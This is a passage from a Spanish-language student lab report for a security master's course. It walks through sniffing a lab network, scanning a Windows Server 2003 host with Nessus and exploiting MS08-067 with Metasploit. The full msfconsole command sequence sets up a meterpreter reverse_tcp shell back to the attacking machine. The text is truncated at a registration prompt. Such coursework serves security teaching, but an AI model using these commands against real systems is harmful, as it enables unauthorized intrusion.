Generar un Evento de seguridad utilizando acceso no autorizado a un sistema
Tarea : Reporte ANP2
Generar un Evento de seguridad utilizando acceso no autorizado a un sistema:
–Porelevación de privilegios
–Por acceso al archivo de passwords
Se debe elaborar informe con evidencias de las herramientas.
Alumno: Juan Agustín Vega Hidalgo
23 de Junio 2014
Modulo Rastreode intrusiones
____________________________________Maestría en Gestión de la Seguridad de la Información
El escenario es el siguiente, tenemos un servidor Windows Server 2003, el cual noconocemos el
password , ni el segmento de red, por lo cual desde una maquina con SO Backtrack, procedemos
con la herramienta nativa Wireshark, en la cual la ponemos en modo de escucha para capturar
tráficoy ver el segmento de red en que esta el servidor Windows.
Luego que capturamos la dirección IP, nos vamos al servidor de Backtrack y procedemos a
configurar la red en el mismo segmento como se veen la imagen abajo detallada.
Modulo Rastreo de intrusiones
____________________________________Maestría en Gestión de la Seguridad de la Información
Luego de configurarnos la dirección IPen el mismo segmento del servidor de Windows, hacem os
ping para validar que le estemos llegando
Cabe mencionar que por medio de Nessus, procedimos escanear el servidor con sistema operativoWindows y nos aparecio que tenia una vulnerabilidad
Modulo Rastreo de intrusiones
____________________________________Maestría en Gestión de la Seguridad de la Información
A continuaciónejecutamos el siguiente comando para utilizar el exploit apropiado para
esta vulnerabilidad:
procedemos a ejecutar los siguientes comandos:
msf > show exploits
msf > use windows/smb/ms08_067_netapimsf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > show options
msf > set RHOST 169.254.167.190
msf > set LHOST 169.254.167.199
msf > show options
msf > exploit
msf > ps
msf > execute -f...
Regístrate para leer el documento completo.